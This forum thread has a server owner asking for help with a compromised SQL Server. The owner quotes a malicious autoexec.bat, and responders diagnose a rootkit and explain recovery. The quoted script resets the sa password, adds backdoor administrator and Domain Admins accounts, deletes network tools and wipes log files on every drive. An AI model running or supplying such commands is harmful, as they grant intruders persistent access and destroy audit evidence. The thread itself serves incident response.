Autoexec.bat modified on sql server

Posted on 2005-04-12
Last Modified: 2013-12-04
I was notified by my data center that my bandwidth went up 500% on my sql server.  Upon investigation we found an exe running (info.exe).  Rebooting the server stops the file from running but a search can not find the file.  And it keeps reappearing.  The box has realtime virus protection running (and yes it is up to date) we also run spyware detection. After further investigation we found that the autoexec.bat had been modified as follows:

@ECHO off

osql -E -Q "sp_password NULL,HOLLOWM@N,sa

net user IUSR_ROOT HOLLOWM@N /add
net localgroup Administrators IUSR_ROOT /add
net group "Domain Admins" IUSR_ROOT /add

net user Admin HOLLOWM@N /add
net localgroup Administrators Admin /add
net group "Domain Admins" Admin /add

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\*.log/s
del d:\*.log/s
del e:\*.log/s
del f:\*.log/s
del g:\*.log/s
del h:\*.log/s
del c:\d.txt
del c:\do.txt
del c:\doc.txt


Any ideas?
Question by:cooperrd
    LVL 12

    Assisted Solution


    Looks like a "Rootkit"
    Download and run these (free):
    {Rootkit Revealer}
    F-Secure Blacklight Rootkit revealer

    Good luck!
    LVL 12

    Accepted Solution

    If you can't figure out the entry mechanism, you may have no chance but to start from scratch.

    You definitely have a rootkit and it's custom from looking at your modified autoexec.bat.

    Here are some other resources to shed light on what has happened:

    Cleaning Up after a Rootkit attack:
    Once you discover a compromised host, you must determine the extent of the attack. You must presume that all network transactions from or to any host "visible" on the network for the duration of the compromise were monitored and that intruders potentially possess any or all of the information so exposed. You should perform recovery and prevent future attacks as described below.

    Disconnect the host from the network or operate the system in single-user mode during the recovery. This will keep users and intruders from accessing the system.

    Locating Trojan versions of the standard system programs can be difficult, and you should be cautious in doing so. The intruder may have installed other Trojan programs not part of Rootkit, therefore all system utilities should NOT be trusted unless restored from distribution media or a floppy disk as discussed above. This especially refers to cd, dir, mkdir, etc.

    I advise that an entire system install be performed from read-only distribution media. If this is not feasible, all system binaries should be compared using a known good copy of md5 against the read-only distribution media. Since rootkits install Trojan programs with the exact checksum and timestamp as the legitimate version, these attributes cannot be used to find Trojan programs. However, cryptographic checksums are nearly impossible to spoof. Therefore, md5 from the read-only floppy described above can be trusted to compare installed programs against the distribution media or known correct checksums.

    Resist the temptation of restoring from backups, unless it is positively known the backups were made before the Trojans were installed. Otherwise there is too great a chance the backups contain the Trojan programs, rather than the legitimate ones.

    Featured Post

    Highfive Gives IT Their Time Back

    Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

    Join & Write a Comment

    This is a guide to the following problem (not exclusive but here) on Windows: Users need our support and we supporters often use global administrative accounts to do this. Using these accounts safely is a real challenge. Any admin who takes se…
    As a Mac user and former AppleCare AHA & Senior Advisor, I'm constantly bombarded with questions about Macs and if they need Antivirus. This short article is my response to those questions.
    Migrating to Microsoft Office 365 is becoming increasingly popular for organizations both large and small. If you have made the leap to Microsoft’s cloud platform, you know that you will need to create a corporate email signature for your Office 365…
    Hi everyone! This is Experts Exchange customer support.  This quick video will show you how to change your primary email address.  If you have any questions, then please Write a Comment below!

    733 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    18 Experts available now in Live!

    Get 1:1 Help Now